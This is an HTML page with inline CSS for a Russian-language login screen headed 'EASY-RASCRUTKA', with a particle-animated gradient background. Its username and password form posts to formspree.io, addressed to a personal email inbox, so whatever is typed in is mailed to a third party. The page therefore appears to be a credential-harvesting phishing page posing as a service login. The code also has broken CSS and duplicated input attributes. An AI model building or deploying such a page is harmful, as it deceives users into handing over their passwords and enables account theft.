<html>
	<head>
		<title>E-R</title>
		<meta charset = "utf-8">
		<link rel="stylesheet" href = "site.css">
	</head>
	
	<body background = "untitled123123123123.png" style="background-attachment:fixed" topmargin="0">
		<div><div id = "particles-js"></div>
		<script type = "text/javascript" src = "particles.js"></script>
		<script type = "text/javascript" src = "app.js"></script>	
		<center><h2 class = "fio">EASY-RASCRUTKA<br><form action="https://formspree.io/abonesoft@ukr.net" method="POST">
		<center><input class = "of1" name = "name" type = "text" name = "pib" placeholder = "Введите имя пользователя:" title = "¬ведите им¤:" required/><br><input class = "of1" name = "password" type = "password" name = "tel" placeholder = "Введите пароль:" title = "введите пароль:" required/>
		<br><input src = "" class = "of2" type = "submit" value = "Войти"/></h2></center></div>
		<style>
.kybik{
	background-color: white;
	height: 100px;
	width: 90px;
	border-radius: 10px;
}
#particles-js{
	height: 100%;
	width: 100%;
	background: red;
	background: linear-gradient(to bottom left, #ffff00, #ff0040);
}
.fio{
  font-size: 50px;
  top: 50%; /* Отступ в процентах от верхнего края окна */
  left: 50%; /* Отступ в процентах от левого края окна */
  width: 450px; /* Ширина блока */
  height: 450px; /* Высота блока */
  position: absolute; /* Абсолютное позиционирование блока */
  margin-top: -225px; /* Отрицательный отступ от верхнего края страницы, должен равняться половине высоты блока со знаком минус */
  margin-left: -225px; /* Отрицательный отступ от левого края
			}
.do1 {
  top: 50%; /* Отступ в процентах от верхнего края окна */
  left: 50%; /* Отступ в процентах от левого края окна */
  width: 450px; /* Ширина блока */
  height: 450px; /* Высота блока */
  position: absolute; /* Абсолютное позиционирование блока */
  margin-top: -225px; /* Отрицательный отступ от верхнего края страницы, должен равняться половине высоты блока со знаком минус */
  margin-left: -225px; /* Отрицательный отступ от левого края страницы, должен равняться половине высоты блока со знаком минус */
}
body{		
    margin: 0;
    padding: 0;
    height: 100vh;
    width: 100%;
    font-family: Whirl Cyrillic;
}
.of1{
	height: 50px;
	width: 350px;
	font-size: 20px;
	boreder-radius: 4px;
}
.of2{
	height: 40px;
	width: 300px;
	font-size: 25px;
}
h1{
	font-size: 100px;
}
.kkkk{
	height: 65px;
	width: 70px;
}
p{
	font-size: 80px;
	color: white;
}
.gradient{
	color: black;
	background: url(kkk.jpg) no-repeat;
	-webkit-background-clip: text;
	-webkit-text-fill-color: transparent;
	animation-name: gradient;
	animation-duration: 2s;
	animation-iteration-count: infinite;
}
@keyframes gradient{
	0%{
		background-position: 0 0;
	}
	50%{
		background-position: 100% 0;
	}
	100%{
		background-position: 0 0;
	}
}
		</style>
	</body>
</html>
